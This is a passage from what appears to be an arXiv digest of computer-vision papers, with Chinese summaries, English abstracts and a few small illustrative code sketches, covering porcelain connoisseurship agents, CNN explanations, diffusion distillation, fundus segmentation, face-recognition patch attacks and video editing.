Abstract:The connoisseurship of antique Chinese porcelain demands extensive historical expertise, material understanding, and aesthetic sensitivity, making it difficult for non-specialists to engage. To democratize cultural-heritage understanding and assist expert connoisseurship, we introduce CiQi-Agent – a domain-specific Porcelain Connoisseurship Agent for intelligent analysis of antique Chinese porcelain. CiQi-Agent supports multi-image porcelain inputs and enables vision tool invocation and multimodal retrieval-augmented generation, performing fine-grained connoisseurship analysis across six attributes: dynasty, reign period, kiln site, glaze color, decorative motif, and vessel shape. Beyond attribute classification, it captures subtle visual details, retrieves relevant domain knowledge, and integrates visual and textual evidence to produce coherent, explainable connoisseurship descriptions. To achieve this capability, we construct a large-scale, expert-annotated dataset CiQi-VQA, comprising 29,596 porcelain specimens, 51,553 images, and 557,940 visual question–answering pairs, and further establish a comprehensive benchmark CiQi-Bench aligned with the previously mentioned six attributes. CiQi-Agent is trained through supervised fine-tuning, reinforcement learning, and a tool-augmented reasoning framework that integrates two categories of tools: a vision tool and multimodal retrieval tools. Experimental results show that CiQi-Agent (7B) outperforms all competitive open- and closed-source models across all six attributes on CiQi-Bench, achieving on average 12.2% higher accuracy than GPT-5. The model and dataset have been released and are publicly available at this https URL.
[CV-35] Post-hoc Self-explanation of CNNs
【速读】:该论文旨在解决标准卷积神经网络(Convolutional Neural Networks, CNNs)在解释性方面的局限性,即其内置原型无法准确反映数据特征的问题。传统CNN虽可数学上重构成自解释模型(Self-Explainable Models, SEMs),但缺乏对决策过程的语义清晰解释。解决方案的关键在于:用基于k-means的分类器替代最终线性层,从而在不牺牲模型性能的前提下提升可解释性;进一步提出统一的形式化方法,对分类器、编码器最后一层输出(B4)及中间特征激活组合进行后验解释,尤其通过利用卷积感受野的空间一致性,生成基于概念的解释图谱,辅以无梯度的特征归因图支持,实现更直观且语义一致的模型解释。
链接: https://arxiv.org/abs/2603.28466
作者: Ahcène Boubekki,Line H. Clemmensen
机构: University of Copenhagen (哥本哈根大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (stat.ML)
备注:
Abstract:Although standard Convolutional Neural Networks (CNNs) can be mathematically reinterpreted as Self-Explainable Models (SEMs), their built-in prototypes do not on their own accurately represent the data. Replacing the final linear layer with a k-means-based classifier addresses this limitation without compromising performance. This work introduces a common formalization of k-means-based post-hoc explanations for the classifier, the encoder’s final output (B4), and combinations of intermediate feature activations. The latter approach leverages the spatial consistency of convolutional receptive fields to generate concept-based explanation maps, which are supported by gradient-free feature attribution maps. Empirical evaluation with a ResNet34 shows that using shallower, less compressed feature activations, such as those from the last three blocks (B234), results in a trade-off between semantic fidelity and a slight reduction in predictive performance.
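下面是一个示意性草图(非论文官方实现),说明"用基于 k-means 的分类器替代最终线性层"的核心思想:为每个类别计算特征质心,推理时按最近质心分配类别;fit_centroids、predict 等函数名均为假设。

```python
# 假设性示意:质心分类器(k-means 风格)替代最终线性层。
# feats 代表编码器输出的特征向量(此处手工给定的二维小例子)。

def centroid(points):
    # 一组特征向量的逐维均值
    dim = len(points[0])
    return [sum(p[d] for p in points) / len(points) for d in range(dim)]

def sq_dist(u, v):
    # 欧氏距离的平方
    return sum((a - b) ** 2 for a, b in zip(u, v))

def fit_centroids(feats, labels):
    # 每个类别一个质心,由该类训练特征平均得到
    classes = sorted(set(labels))
    return {c: centroid([f for f, y in zip(feats, labels) if y == c])
            for c in classes}

def predict(cents, feat):
    # 预测 = 距离最近的类别质心
    return min(cents, key=lambda c: sq_dist(cents[c], feat))

feats = [[0.0, 0.0], [0.2, 0.1], [1.0, 1.0], [0.9, 1.1]]
labels = [0, 0, 1, 1]
cents = fit_centroids(feats, labels)
pred = predict(cents, [0.1, 0.0])
```

质心本身即可作为"内置原型"用于解释:样本到各质心的距离直接说明了决策依据,这正是该类方法可解释性的来源。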
[CV-36] Decoupling Wavelet Sub-bands for Single Source Domain Generalization in Fundus Image Segmentation
【速读】:该论文旨在解决眼底图像(fundus imaging)中域泛化(domain generalization, DG)问题,即深度学习模型在面对不同设备和临床场景下的数据分布变化时性能下降的问题。由于跨域标注数据获取成本高且受隐私限制,现有单源域泛化(single-source domain generalization, SDG)方法往往无法有效捕捉解剖拓扑结构或分离外观特征与解剖特征。其解决方案的关键在于提出WaveSDG网络,通过小波子带分解(wavelet sub-band decomposition)实现解剖结构与域特定外观的解耦;创新性地设计了基于小波的不变结构提取与精炼模块(Wavelet-based Invariant Structure Extraction and Refinement, WISER),利用各小波子带的不同语义角色:低频分量用于锚定全局解剖结构,高频分量则选择性增强方向边缘并抑制噪声,从而提升模型在未见域上的准确性和鲁棒性。
链接: https://arxiv.org/abs/2603.28463
作者: Shramana Dey,Varun Ajith,Abhirup Banerjee,Sushmita Mitra
机构: Indian Statistical Institute (印度统计研究所); University of Oxford (牛津大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Domain generalization in fundus imaging is challenging due to variations in acquisition conditions across devices and clinical settings. The inability to adapt to these variations causes performance degradation on unseen domains for deep learning models. Besides, obtaining annotated data across domains is often expensive and privacy constraints restrict their availability. Although single-source domain generalization (SDG) offers a realistic solution to this problem, the existing approaches frequently fail to capture anatomical topology or decouple appearance from anatomical features. This research introduces WaveSDG, a new wavelet-guided segmentation network for SDG. It decouples anatomical structure from domain-specific appearance through a wavelet sub-band decomposition. A novel Wavelet-based Invariant Structure Extraction and Refinement (WISER) module is proposed to process encoder features by leveraging distinct semantic roles of each wavelet sub-band. The module refines low-frequency components to anchor global anatomy, while selectively enhancing directional edges and suppressing noise within the high-frequency sub-bands. Extensive ablation studies validate the effectiveness of the WISER module and its decoupling strategy. Our evaluations on optic cup and optic disc segmentation across one source and five unseen target datasets show that WaveSDG consistently outperforms seven state-of-the-art methods. Notably, it achieves the best balanced Dice score and lowest 95th percentile Hausdorff distance with reduced variance, indicating improved accuracy, robustness, and cross-domain stability.
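为直观展示"小波子带将低频结构与高频细节解耦"的思想,下面给出一维一阶 Haar 分解的极简示意(非 WaveSDG 实际使用的变换与子带处理):低频子带近似整体结构,高频子带保留局部差异,且二者可无损重建原信号。

```python
# 假设性示意:一维一阶 Haar 小波分解与重建。
# 低频 = 相邻两点均值(整体结构),高频 = 相邻两点差的一半(局部细节)。

def haar_split(signal):
    low = [(a + b) / 2 for a, b in zip(signal[0::2], signal[1::2])]
    high = [(a - b) / 2 for a, b in zip(signal[0::2], signal[1::2])]
    return low, high

def haar_merge(low, high):
    out = []
    for l, h in zip(low, high):
        out += [l + h, l - h]  # 分解的精确逆变换
    return out

sig = [4.0, 2.0, 1.0, 3.0]
low, high = haar_split(sig)  # low 承载整体形状,high 承载边缘/噪声信息
```

论文中对低频分量"锚定全局解剖结构"、对高频分量"选择性增强方向边缘并抑制噪声"的处理,正是分别作用于此类子带之上。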
[CV-37] R_dm: Re-conceptualizing Distribution Matching as a Reward for Diffusion Distillation
【速读】:该论文旨在解决扩散模型(Diffusion Models)在生成过程中因迭代采样速度慢而导致的效率瓶颈问题,尤其是在使用扩散蒸馏(Diffusion Distillation)技术实现少步生成时,传统方法受限于仅以教师模型为锚点的蒸馏目标,难以突破性能上限。其解决方案的关键在于提出一种全新的范式——将分布匹配(Distribution Matching)重新定义为奖励信号 $ R_{dm} $,从而统一扩散蒸馏与强化学习(Reinforcement Learning, RL)的优化框架。该设计通过引入组归一化分布匹配(Group Normalized Distribution Matching, GNDM)提升奖励估计的稳定性,并支持灵活的多奖励融合机制和重要性采样(Importance Sampling, IS),显著提升了采样效率与生成质量,在FID指标上相比基线降低1.87,同时在美学质量与保真度之间取得更优平衡。
链接: https://arxiv.org/abs/2603.28460
作者: Linqian Fan,Peiqin Sun,Tiancheng Wen,Shun Lu,Chengru Song
机构: Kling Team, Kuaishou Technology (快手科技); Tsinghua University (清华大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:Diffusion models achieve state-of-the-art generative performance but are fundamentally bottlenecked by their slow iterative sampling process. While diffusion distillation techniques enable high-fidelity few-step generation, traditional objectives often restrict the student’s performance by anchoring it solely to the teacher. Recent approaches have attempted to break this ceiling by integrating Reinforcement Learning (RL), typically through a simple summation of distillation and RL objectives. In this work, we propose a novel paradigm by reconceptualizing distribution matching as a reward, denoted as R_dm. This unified perspective bridges the algorithmic gap between Diffusion Matching Distillation (DMD) and RL, providing several key benefits. (1) Enhanced optimization stability: we introduce Group Normalized Distribution Matching (GNDM), which adapts standard RL group normalization to stabilize R_dm estimation. By leveraging group-mean statistics, GNDM establishes a more robust and effective optimization direction. (2) Seamless reward integration: our reward-centric formulation inherently supports adaptive weighting mechanisms, allowing flexible combination of DMD with external reward models. (3) Improved sampling efficiency: by aligning with RL principles, the framework readily incorporates importance sampling (IS), leading to a significant boost in sampling efficiency. Extensive experiments demonstrate that GNDM outperforms vanilla DMD, reducing the FID by 1.87. Furthermore, our multi-reward variant, GNDMR, surpasses existing baselines by achieving a strong balance between aesthetic quality and fidelity, reaching a peak HPS of 30.37 and a low FID-SD of 12.21. Overall, R_dm provides a flexible, stable, and efficient framework for real-time high-fidelity synthesis. Code will be released upon publication.
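摘要中提到的"利用组均值统计稳定奖励估计"可用如下极简草图说明(非论文官方实现):对同组样本的奖励减去组均值、除以组标准差,这与强化学习中常见的组归一化优势估计形式一致;group_normalize 为假设性函数名。

```python
# 假设性示意:对一组样本的奖励做组归一化(减均值、除标准差),
# 对应摘要中 GNDM 稳定 R_dm 估计所采用的标准 RL 组归一化形式。
import math

def group_normalize(rewards, eps=1e-8):
    mean = sum(rewards) / len(rewards)
    var = sum((r - mean) ** 2 for r in rewards) / len(rewards)
    std = math.sqrt(var)
    # eps 防止组内奖励完全相同时出现除零
    return [(r - mean) / (std + eps) for r in rewards]

adv = group_normalize([1.0, 2.0, 3.0])  # 归一化后以 0 为中心、方差约为 1
```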
[CV-38] FeDMRA: Federated Incremental Learning with Dynamic Memory Replay Allocation
【速读】:该论文旨在解决联邦医疗系统中联邦类增量学习(Federated Class-Incremental Learning, FCIL)面临的挑战,特别是当分布式客户端数据呈现非独立同分布(non-IID)特性时,传统持续学习方法因无法有效应对数据异构性而失效的问题。解决方案的关键在于提出一种基于数据回放机制的动态示例存储(exemplar storage)内存分配策略,该策略通过挖掘数据异构性的内在潜力并兼顾各参与客户端的性能公平性,实现有限存储资源在客户端间的合理分配,从而缓解灾难性遗忘(catastrophic forgetting),提升整体模型适应性和稳定性。
链接: https://arxiv.org/abs/2603.28455
作者: Tiantian Wang,Xiang Xiang,Simon S. Du
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Distributed, Parallel, and Cluster Computing (cs.DC); Machine Learning (stat.ML)
备注:
Abstract:In federated healthcare systems, Federated Class-Incremental Learning (FCIL) has emerged as a key paradigm, enabling continuous adaptive model learning among distributed clients while safeguarding data privacy. However, in practical applications, data across agent nodes within the distributed framework often exhibits non-independent and identically distributed (non-IID) characteristics, rendering traditional continual learning methods inapplicable. To address these challenges, this paper covers more comprehensive incremental task scenarios and proposes a dynamic memory allocation strategy for exemplar storage based on the data replay mechanism. This strategy fully taps into the inherent potential of data heterogeneity, while taking into account the performance fairness of all participating clients, thereby establishing a balanced and adaptive solution to mitigate catastrophic forgetting. Unlike the fixed allocation of client exemplar memory, the proposed scheme emphasizes the rational allocation of limited storage resources among clients to improve model performance. Furthermore, extensive experiments are conducted on three medical image datasets, and the results demonstrate significant performance improvements compared to existing baseline models.
[CV-39] GeoHCC: Local Geometry-Aware Hierarchical Context Compression for 3D Gaussian Splatting
【速读】:该论文旨在解决3D高斯溅射(3D Gaussian Splatting, 3DGS)在实际部署中因存储开销过大而导致的瓶颈问题,尤其是现有基于锚点(anchor-based)的压缩方法忽视显式几何依赖关系,造成结构退化和率失真性能不佳的问题。解决方案的关键在于提出GeoHCC框架,其核心创新包括:一是引入邻域感知锚点剪枝(Neighborhood-Aware Anchor Pruning, NAAP),通过加权邻域特征聚合评估锚点重要性并合并冗余锚点,从而获得紧凑且几何一致的锚点集;二是设计分层熵编码机制,利用轻量级几何引导卷积(Geometry-Guided Convolution, GG-Conv)构建从粗到细的上下文先验,实现空间自适应建模与率失真优化,显著提升几何保真度和渲染质量。
链接: https://arxiv.org/abs/2603.28431
作者: Xuan Deng,Xiandong Meng,Hengyu Man,Qiang Zhu,Tiange Zhang,Debin Zhao,Xiaopeng Fan
机构: Harbin Institute of Technology (哈尔滨工业大学); Peng Cheng Laboratory (鹏城实验室); Harbin Institute of Technology Suzhou Research Institute (哈尔滨工业大学苏州研究院)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 10
Abstract:Although 3D Gaussian Splatting (3DGS) enables high-fidelity real-time rendering, its prohibitive storage overhead severely hinders practical deployment. Recent anchor-based 3DGS compression schemes reduce redundancy through context modeling, yet overlook explicit geometric dependencies, leading to structural degradation and suboptimal rate-distortion performance. In this paper, we propose GeoHCC, a geometry-aware 3DGS compression framework that incorporates inter-anchor geometric correlations into anchor pruning and entropy coding for compact representation. We first introduce Neighborhood-Aware Anchor Pruning (NAAP), which evaluates anchor importance via weighted neighborhood feature aggregation and merges redundant anchors into salient neighbors, yielding a compact yet geometry-consistent anchor set. Building upon this optimized structure, we further develop a hierarchical entropy coding scheme, in which coarse-to-fine priors are exploited through a lightweight Geometry-Guided Convolution (GG-Conv) operator to enable spatially adaptive context modeling and rate-distortion optimization. Extensive experiments demonstrate that GeoHCC effectively resolves the structure preservation bottleneck, maintaining superior geometric integrity and rendering fidelity over state-of-the-art anchor-based approaches.
[CV-40] -Catch: Adaptive Teleoperation for Dexterous Dynamic 3D Object Catching
【速读】:该论文旨在解决动态物体抓取任务中纯遥操作(teleoperation)因时序、姿态和力控误差导致的失败问题,其核心挑战在于如何在物体运动过程中实现高精度、鲁棒的手部操控。解决方案的关键在于提出Tele-Catch框架,其中包含两个核心技术:一是DAIM(Dynamics-aware Adaptive Integration Mechanism),通过将手套输入信号融合到扩散策略(diffusion policy)的去噪过程,根据交互对象状态自适应调节控制;二是DP-U3R,利用点云观测中的无监督几何表示增强扩散策略学习,实现几何感知决策。二者共同实现了人机协同自主(shared autonomy),显著提升了动态抓取任务的准确性和泛化能力。
链接: https://arxiv.org/abs/2603.28427
作者: Weiguang Zhao,Junting Dong,Rui Zhang,Kailin Li,Qin Zhao,Kaizhu Huang
机构: 未知
类目: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Teleoperation is a key paradigm for transferring human dexterity to robots, yet most prior work targets objects that are initially static, such as grasping or manipulation. Dynamic object catch, where objects move before contact, remains underexplored. Pure teleoperation in this task often fails due to timing, pose, and force errors, highlighting the need for shared autonomy that combines human input with autonomous policies. To this end, we present Tele-Catch, a systematic framework for dexterous hand teleoperation in dynamic object catching. At its core, we design DAIM, a dynamics-aware adaptive integration mechanism that realizes shared autonomy by fusing glove-based teleoperation signals into the diffusion policy denoising process. It adaptively modulates control based on the interaction object state. To improve policy robustness, we introduce DP-U3R, which integrates unsupervised geometric representations from point cloud observations into diffusion policy learning, enabling geometry-aware decision making. Extensive experiments demonstrate that Tele-Catch significantly improves accuracy and robustness in dynamic catching tasks, while also exhibiting consistent gains across distinct dexterous hand embodiments and previously unseen object categories.
[CV-41] From Pixels to Reality: Physical-Digital Patch Attacks on Real-World Camera
【速读】:该论文旨在解决当前基于摄像头的认证系统(如人脸识别)在物理世界中面临的对抗攻击问题,尤其是传统打印类对抗样本在实际部署中存在部署效率低、跨模型迁移能力弱等局限。其解决方案的关键在于提出一种全新的数字-物理对抗攻击方法(Digital-Physical Adversarial Attacks, DiPA),即通过在智能手机屏幕上直接显示对抗补丁(adversarial patch),实现无需打印、快速部署且无需总变差正则化(total-variation regularization)的攻击方式。DiPA利用ArcFace、MagFace和CosFace等主流人脸识别模型的集成策略增强补丁在黑盒场景下的迁移性,并通过实时演示验证其在降低检测置信度、提升攻击成功率及扰动特征空间方面的显著优势,揭示了移动设备、普适视觉与传感器驱动认证基础设施之间的关键安全漏洞。
链接: https://arxiv.org/abs/2603.28425
作者: Victoria Leonenkova,Ekaterina Shumitskaya,Dmitriy Vatolin,Anastasia Antsiferova
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to the PerCom 2026 Demo
Abstract:This demonstration presents Digital-Physical Adversarial Attacks (DiPA), a new class of practical adversarial attacks against pervasive camera-based authentication systems, where an attacker displays an adversarial patch directly on a smartphone screen instead of relying on printed artifacts. This digital-only physical presentation enables rapid deployment, removes the need for total-variation regularization, and improves patch transferability in black-box conditions. DiPA leverages an ensemble of state-of-the-art face-recognition models (ArcFace, MagFace, CosFace) to enhance transfer across unseen commercial systems. Our interactive demo shows a real-time dodging attack against a deployed face-recognition camera, preventing authorized users from being recognized while participants dynamically adjust patch patterns and observe immediate effects on the sensing pipeline. We further demonstrate DiPA’s superiority over existing physical attacks in terms of success rate, feature-space distortion, and reductions in detection confidence, highlighting critical vulnerabilities at the intersection of mobile devices, pervasive vision, and sensor-driven authentication infrastructures.
[CV-42] Unified Restoration-Perception Learning: Maritime Infrared-Visible Image Fusion and Segmentation
【速读】:该论文旨在解决海洋场景下由于雾和强反射等复杂因素导致的图像退化问题,这些问题严重削弱了语义感知的稳定性。现有图像增强与恢复方法通常仅针对特定退化类型或仅关注视觉质量,缺乏端到端协同机制以同时提升结构恢复与语义有效性;此外,公开的红外-可见光数据集多来自城市环境,无法真实反映海洋场景中耦合退化的特性。解决方案的关键在于提出一个名为Infrared-Visible Maritime Ship Dataset (IVMSD) 的新数据集,覆盖多种气象与光照条件下的海洋场景,并在此基础上构建多任务互补学习框架(Multi-task Complementary Learning Framework, MCLF),通过频率-空间增强互补模块(Frequency-Spatial Enhancement Complementary, FSEC)抑制退化并增强结构信息、语义-视觉一致性注意力模块(Semantic-Visual Consistency Attention, SVCA)提供语义一致引导、以及跨模态引导注意力机制实现选择性融合,从而在统一架构中协同完成图像恢复、多模态融合与语义分割任务,显著提升了复杂海洋环境下语义分割的鲁棒性和感知质量。
链接: https://arxiv.org/abs/2603.28414
作者: Weichao Cai,Weiliang Huang,Biao Xue,Chao Huang,Fei Yuan,Bob Zhang
机构: Xiamen University (厦门大学); University of Macau (澳门大学); Sun Yat-sen University (中山大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Marine scene understanding and segmentation plays a vital role in maritime monitoring and navigation safety. However, prevalent factors like fog and strong reflections in maritime environments cause severe image degradation, significantly compromising the stability of semantic perception. Existing restoration and enhancement methods typically target specific degradations or focus solely on visual quality, lacking end-to-end collaborative mechanisms that simultaneously improve structural recovery and semantic effectiveness. Moreover, publicly available infrared-visible datasets are predominantly collected from urban scenes, failing to capture the authentic characteristics of coupled degradations in marine environments. To address these challenges, the Infrared-Visible Maritime Ship Dataset (IVMSD) is proposed to cover various maritime scenarios under diverse weather and illumination conditions. Building upon this dataset, a Multi-task Complementary Learning Framework (MCLF) is proposed to collaboratively perform image restoration, multimodal fusion, and semantic segmentation within a unified architecture. The framework includes a Frequency-Spatial Enhancement Complementary (FSEC) module for degradation suppression and structural enhancement, a Semantic-Visual Consistency Attention (SVCA) module for semantic-consistent guidance, and a cross-modality guided attention mechanism for selective fusion. Experimental results on IVMSD demonstrate that the proposed method achieves state-of-the-art segmentation performance, significantly enhancing robustness and perceptual quality under complex maritime conditions.
[CV-43] EdgeDiT: Hardware-Aware Diffusion Transformers for Efficient On-Device Image Generation CVPR2026
【速读】:该论文旨在解决扩散 Transformer(Diffusion Transformers, DiT)在资源受限的边缘设备上部署时面临的计算复杂度高和内存占用大的问题,从而阻碍其在移动神经处理单元(Neural Processing Units, NPUs)上的本地化应用。解决方案的关键在于提出 EdgeDiT,一个面向移动端 NPU 的硬件感知优化框架,通过系统性识别并剪枝 DiT 主干结构中对移动数据流特别不利的冗余模块,实现模型轻量化:在不牺牲原始 Transformer 架构的扩展优势和表达能力的前提下,参数量减少 20–30%,浮点运算次数(FLOPs)降低 36–46%,设备端推理延迟降低 1.65 倍,同时在 Frechet Inception Distance(FID)与推理延迟之间实现了更优的帕累托前沿。
链接: https://arxiv.org/abs/2603.28405
作者: Sravanth Kodavanti,Manjunath Arveti,Sowmya Vajrala,Srinivas Miriyala,Vikram N R
机构: Samsung Research Institute Bangalore(三星研究院班加罗尔)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Accepted at the Mobile AI Workshop, CVPR 2026
Abstract:Diffusion Transformers (DiT) have established a new state-of-the-art in high-fidelity image synthesis; however, their massive computational complexity and memory requirements hinder local deployment on resource-constrained edge devices. In this paper, we introduce EdgeDiT, a family of hardware-efficient generative transformers specifically engineered for mobile Neural Processing Units (NPUs), such as the Qualcomm Hexagon and Apple Neural Engine (ANE). By leveraging a hardware-aware optimization framework, we systematically identify and prune structural redundancies within the DiT backbone that are particularly taxing for mobile data-flows. Our approach yields a series of lightweight models that achieve a 20-30% reduction in parameters, a 36-46% decrease in FLOPs, and a 1.65-fold reduction in on-device latency without sacrificing the scaling advantages or the expressive capacity of the original transformer architecture. Extensive benchmarking demonstrates that EdgeDiT offers a superior Pareto-optimal trade-off between Frechet Inception Distance (FID) and inference latency compared to both optimized mobile U-Nets and vanilla DiT variants. By enabling responsive, private, and offline generative AI directly on-device, EdgeDiT provides a scalable blueprint for transitioning large-scale foundation models from high-end GPUs to the palm of the user.
[CV-44] SVH-BD : Synthetic Vegetation Hyperspectral Benchmark Dataset for Emulation of Remote Sensing Images
【速读】:该论文旨在解决植被性状反演与辐射传输模拟中的不确定性量化问题,特别是在高光谱遥感数据下如何实现精准、高效且物理一致的植被生物物理参数估计。其解决方案的关键在于构建了一个大规模合成高光谱图像立方体数据集(包含10,915个样本),每个立方体具有211个波段(400–2500 nm,分辨率10 nm)和固定的空间布局(64×64像素),并配以像素级植被性状地图(如叶面积指数、叶绿素含量等)。这些数据通过基于PROSAIL模型的查找表反演方法从Sentinel-2 Level-2A表面反射率推导出植被性状,并进一步利用正向PROSAIL模拟生成符合物理约束的高光谱反射率,从而保证了环境条件下的光谱-生物物理关系的真实性和可控性。此外,数据集还包含第5和第95百分位的不确定性图层及Sentinel-2场景分类层,为快速辐射传输模拟器开发、反演算法基准测试以及复杂生态区域中光谱-生物物理关系研究提供了可靠基础。
链接: https://arxiv.org/abs/2603.28390
作者: Chedly Ben Azizi,Claire Guilloteau,Gilles Roussel,Matthieu Puigt
机构: Univ. Littoral Côte d’Opale (滨海大学); LISIC – UR 4491 (信息与系统科学研究所)
类目: Computer Vision and Pattern Recognition (cs.CV); Signal Processing (eess.SP)
备注:
Abstract:This dataset provides a large collection of 10,915 synthetic hyperspectral image cubes paired with pixel-level vegetation trait maps, designed to support research in radiative transfer emulation, vegetation trait retrieval, and uncertainty quantification. Each hyperspectral cube contains 211 bands spanning 400–2500 nm at 10 nm resolution and a fixed spatial layout of 64×64 pixels, offering continuous simulated surface reflectance spectra suitable for emulator development and machine-learning tasks requiring high spectral detail. Vegetation traits were derived by inverting Sentinel-2 Level-2A surface reflectance using a PROSAIL-based lookup-table approach, followed by forward PROSAIL simulations to generate hyperspectral reflectance under physically consistent canopy and illumination conditions. The dataset covers four ecologically diverse regions – East Africa, Northern France, Eastern India, and Southern Spain – and includes 5th and 95th percentile uncertainty maps as well as Sentinel-2 scene classification layers. This resource enables benchmarking of inversion methods, development of fast radiative transfer emulators, and studies of spectral–biophysical relationships under controlled yet realistic environmental variability.
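摘要中"基于查找表(LUT)的反演"可用如下极简草图说明(非论文官方流程,也未建模真实的 PROSAIL):先用正向模型为一组候选性状值生成模拟光谱,再取与观测光谱最接近者对应的性状作为反演结果;toy_forward 为假设性的玩具正向模型。

```python
# 假设性示意:查找表(LUT)反演。
# toy_forward 是把单一性状(此处记作 LAI)映射到三波段光谱的玩具正向模型,
# 仅用于演示"正向模拟 + 最近邻匹配"的反演流程。

def toy_forward(lai):
    return [0.1 + 0.05 * lai, 0.3 - 0.02 * lai, 0.2 + 0.01 * lai]

def lut_invert(observed, candidates):
    best, best_err = None, float("inf")
    for lai in candidates:
        spec = toy_forward(lai)
        # 以光谱均方误差作为匹配代价
        err = sum((o - s) ** 2 for o, s in zip(observed, spec))
        if err < best_err:
            best, best_err = lai, err
    return best

obs = toy_forward(2.0)  # 由真值 LAI=2.0 生成的"观测"光谱
lai_hat = lut_invert(obs, [0.0, 1.0, 2.0, 3.0, 4.0])
```

实际的 PROSAIL 反演需处理 211 个波段、多个耦合性状以及观测噪声,通常还会用候选解的分布(如第 5/95 百分位)来量化不确定性。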
[CV-45] Rethinking Structure Preservation in Text-Guided Image Editing with Visual Autoregressive Models
【速读】:该论文旨在解决基于视觉自回归模型(Visual Autoregressive, VAR)的文本引导图像编辑中存在的两个关键问题:一是准确定位可编辑的图像标记(token),二是保持编辑结果与源图像之间的结构一致性。解决方案的关键在于:首先提出一种粗到细的标记定位策略,以在编辑保真度与背景保留之间取得平衡;其次通过分析VAR模型中间特征分布,识别出与结构相关的特征,并设计了一种简单而有效的特征注入机制来增强结构一致性;最后引入基于强化学习的自适应特征注入方案,自动学习不同尺度和层的注入比例,从而协同优化编辑保真度与结构保留效果。
链接: https://arxiv.org/abs/2603.28367
作者: Tao Xia,Jiawei Liu,Yukun Zhang,Ting Liu,Wei Wang,Lei Zhang
机构: Beijing Institute of Technology (北京理工大学); Shenyang Institute of Automation, CAS (中国科学院沈阳自动化研究所); Meitu Inc, MTLab (美图公司MTLab)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Visual autoregressive (VAR) models have recently emerged as a promising family of generative models, enabling a wide range of downstream vision tasks such as text-guided image editing. By shifting the editing paradigm from noise manipulation in diffusion-based methods to token-level operations, VAR-based approaches achieve better background preservation and significantly faster inference. However, existing VAR-based editing methods still face two key challenges: accurately localizing editable tokens and maintaining structural consistency in the edited results. In this work, we propose a novel text-guided image editing framework rooted in an analysis of intermediate feature distributions within VAR models. First, we introduce a coarse-to-fine token localization strategy that can refine editable regions, balancing editing fidelity and background preservation. Second, we analyze the intermediate representations of VAR models and identify structure-related features, by which we design a simple yet effective feature injection mechanism to enhance structural consistency between the edited and source images. Third, we develop a reinforcement learning-based adaptive feature injection scheme that automatically learns scale- and layer-specific injection ratios to jointly optimize editing fidelity and structure preservation. Extensive experiments demonstrate that our method achieves superior structural consistency and editing quality compared with state-of-the-art approaches, across both local and global editing scenarios.
[CV-46] AutoCut: End-to-end advertisement video editing based on multimodal discretization and controllable generation CVPR2026
【速读】:该论文旨在解决短格式视频(short-form videos)在数字广告内容创作中因现有工作流程和AI工具分散、模态特定而导致的生产成本高、效率低的问题。解决方案的关键在于提出AutoCut框架,其核心创新是通过多模态离散化(multimodal discretization)构建统一的视频-音频-文本标记空间:利用专用编码器提取视频与音频特征,并采用残差向量量化(residual vector quantization)将其离散化为与文本表示对齐的统一标记,进而基于基础模型开发支持视频选择排序、脚本生成和背景音乐选择等任务的多模态大语言模型(multimodal large language model),最终实现端到端可控编辑与可部署长视频输出,显著提升一致性与可控性并降低制作成本与迭代时间。
链接: https://arxiv.org/abs/2603.28366
作者: Milton Zhou,Sizhong Qin,Yongzhi Li,Quan Chen,Peng Jiang
机构: Tsinghua University (清华大学); Kuaishou Technology (快手科技)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR 2026
Abstract:Short-form videos have become a primary medium for digital advertising, requiring scalable and efficient content creation. However, current workflows and AI tools remain disjoint and modality-specific, leading to high production costs and low overall efficiency. To address this issue, we propose AutoCut, an end-to-end advertisement video editing framework based on multimodal discretization and controllable editing. AutoCut employs dedicated encoders to extract video and audio features, then applies residual vector quantization to discretize them into unified tokens aligned with textual representations, constructing a shared video-audio-text token space. Built upon a foundation model, we further develop a multimodal large language model for video editing through combined multimodal alignment and supervised fine-tuning, supporting tasks covering video selection and ordering, script generation, and background music selection within a unified editing framework. Finally, a complete production pipeline converts the predicted token sequences into deployable long video outputs. Experiments on real-world advertisement datasets show that AutoCut reduces production cost and iteration time while substantially improving consistency and controllability, paving the way for scalable video creation.
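摘要中提到的残差向量量化(residual vector quantization, RVQ)——"量化、减去残差、再量化"——可以用如下极简示意代码理解(码本为随机初始化的玩具示例,仅演示原理,并非 AutoCut 的实际实现):

```python
import numpy as np

rng = np.random.default_rng(0)

def rvq_encode(x, codebooks):
    """Residual vector quantization: quantize, subtract, repeat per stage."""
    residual = x.copy()
    indices, recon = [], np.zeros_like(x)
    for cb in codebooks:                              # one codebook per stage
        d = np.linalg.norm(cb - residual, axis=1)     # distance to every code
        idx = int(np.argmin(d))                       # nearest code index
        indices.append(idx)
        recon += cb[idx]
        residual = residual - cb[idx]                 # next stage quantizes leftover
    return indices, recon

dim, n_codes, n_stages = 8, 16, 3
codebooks = [rng.normal(size=(n_codes, dim)) for _ in range(n_stages)]
x = rng.normal(size=dim)
idx, recon = rvq_encode(x, codebooks)   # idx 即该向量的离散 token 序列
```

各级码本索引 `idx` 连接起来即构成统一 token 空间中的离散表示;在训练好的码本下,级数越多重建误差通常越小。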
[CV-47] SEA: Evaluating Sketch Abstraction Efficiency via Element-level Commonsense Visual Question Answering
【速读】:该论文旨在解决现有草图(sketch)评估方法难以量化语义抽象效率的问题。传统方法依赖参考图像、低层视觉特征或识别准确率,无法捕捉草图的核心特性——抽象性(abstraction)。其解决方案的关键在于提出一种无参考的评估指标SEA(Sketch Evaluation metric for Abstraction efficiency),该指标通过分析草图中是否保留了类别定义性的视觉元素(由常识知识确定)来衡量其在视觉经济性下的语义保留程度,并借助视觉问答模型进行自动化判定,从而实现对草图抽象效率的定量评估。同时,作者构建了首个语义标注的草图数据集CommonSketch,为该指标提供系统性验证基础。
链接: https://arxiv.org/abs/2603.28363
